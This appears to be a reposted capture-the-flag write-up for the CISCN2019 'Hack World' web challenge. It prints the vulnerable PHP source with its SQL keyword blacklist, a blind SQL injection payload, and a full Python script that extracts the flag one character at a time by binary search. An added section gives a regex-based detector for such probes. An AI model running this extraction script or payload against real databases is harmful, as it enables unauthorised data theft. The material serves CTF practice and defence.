[CISCN2019 North China Division Day2 Web1] Hack World

Key point: the challenge already tells you that both the table name and the column name are flag, so what remains is boolean-based blind injection with the ascii and substr functions.
e.g.:
id=(ascii(substr((select(flag)from(flag)),1,1))<128)

0x01

Looking at the source code posted online:

<?php
$dbuser = 'root';
$dbpass = 'root';

function safe($sql) {
    # Filtered content; functions are basically not filtered
    $blackList = array(' ', '||', '#', '-', ';', '&', '+', 'or', 'and', '`', '"', 'insert', 'group', 'limit', 'update', 'delete', '*', 'into', 'union', 'load_file', 'outfile', './');
    foreach ($blackList as $blackitem) {
        if (stripos($sql, $blackitem)) {
            return False;
        }
    }
    return True;
}

if (isset($_POST['id'])) {
    $id = $_POST['id'];
} else {
    die();
}

$db = mysql_connect("localhost", $dbuser, $dbpass);
if (!$db) {
    die(mysql_error());
}
mysql_select_db("ctf", $db);

if (safe($id)) {
    $query = mysql_query("SELECT content from passage WHERE id = ${id} limit 0,1");
    if ($query) {
        $result = mysql_fetch_array($query);
        if ($result) {
            echo $result['content'];
        } else {
            echo "Error Occured When Fetch Result.";
        }
    } else {
        var_dump($query);
    }
} else {
    die("SQL Injection Checked.");
}

A pile of things is filtered, but notice that many functions are not, so the next step is simply to build the injection out of those functions.

Use substr to cut characters out of the flag, one position further each time. Use the if function to test what the extracted character is; this has to be enumerated. If the comparison holds, the expression returns 1, otherwise 2.

0x02 Solution

Here is the wp script:

import requests
import time

# The URL changes with each instance; use the one from your own session
url = 'http://40c9be7a-36f0-4e80-94ca-d1ac9e121947.node1.buuoj.cn/index.php'
data = {"id": ""}
flag = 'flag{'
i = 6
while True:
    # Start from the printable character range
    begin = 32
    end = 126
    tmp = (begin + end) // 2
    # Binary search on the ASCII value of the i-th character of the flag
    while begin < end:
        print(begin, tmp, end)
        time.sleep(1)
        data["id"] = "if(ascii(substr((select flag from flag),{},1))>{},1,2)".format(i, tmp)
        r = requests.post(url, data=data)
        if 'Hello' in r.text:
            # id evaluated to 1: the character is greater than tmp
            begin = tmp + 1
            tmp = (begin + end) // 2
        else:
            end = tmp
            tmp = (begin + end) // 2
    flag += chr(tmp)
    print(flag)
    i += 1
    if flag[-1] == '}':
        break
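Added here as a defender-side illustration, not part of the original writeup: a small Python detector that recognises the `if(ascii(substr(...))>N,1,2)` probe shape the script above sends and flags a client that walks several thresholds at the same character position (the binary search). It assumes a constructed log format of one line per request, `<client ip> <POST body>`; the sample lines are made up.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Probe shape from the challenge: if(ascii(substr(<subquery>,<pos>,1))><threshold>,1,2)
# Only the function chain and the comparison are anchored, so space-free
# variants such as (select(flag)from(flag)) are matched as well.
PROBE_RE = re.compile(
    r"if\s*\(\s*ascii\s*\(\s*substr\s*\((?P<sub>.+?),\s*(?P<pos>\d+)\s*,\s*1\s*\)\s*\)"
    r"\s*(?P<op>[<>=]+)\s*(?P<thr>\d+)",
    re.IGNORECASE,
)

# Constructed sample log: "<client ip> <POST body>", bodies already URL-decoded
SAMPLE_LOG = [
    "10.0.0.5 id=1",
    "10.0.0.9 id=if(ascii(substr((select flag from flag),6,1))>79,1,2)",
    "10.0.0.9 id=if(ascii(substr((select flag from flag),6,1))>102,1,2)",
    "10.0.0.9 id=if(ascii(substr((select flag from flag),6,1))>114,1,2)",
    "10.0.0.9 id=if(ascii(substr((select(flag)from(flag)),7,1))>79,1,2)",
    "10.0.0.5 id=2",
]


def parse_probe(body):
    """Return (position, operator, threshold) if the body carries a blind probe, else None."""
    m = PROBE_RE.search(unquote_plus(body))
    if not m:
        return None
    return int(m.group("pos")), m.group("op"), int(m.group("thr"))


def probing_sources(log_lines, min_probes=3):
    """Map each suspicious client IP to the largest number of distinct thresholds it
    tried at one character position. Several thresholds at the same position is a
    binary search, not a legitimate article id."""
    per_ip = defaultdict(lambda: defaultdict(set))
    for line in log_lines:
        ip, _, body = line.partition(" ")
        probe = parse_probe(body)
        if probe:
            pos, _, thr = probe
            per_ip[ip][pos].add(thr)
    return {
        ip: max(len(thresholds) for thresholds in positions.values())
        for ip, positions in per_ip.items()
        if any(len(thresholds) >= min_probes for thresholds in positions.values())
    }


if __name__ == "__main__":
    print(probing_sources(SAMPLE_LOG))  # {'10.0.0.9': 3}
```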
Reference link
https://www.cnblogs.com/kevinbruce656/p/11342580.html


Reposted from www.cnblogs.com/wangtanzhi/p/11869684.html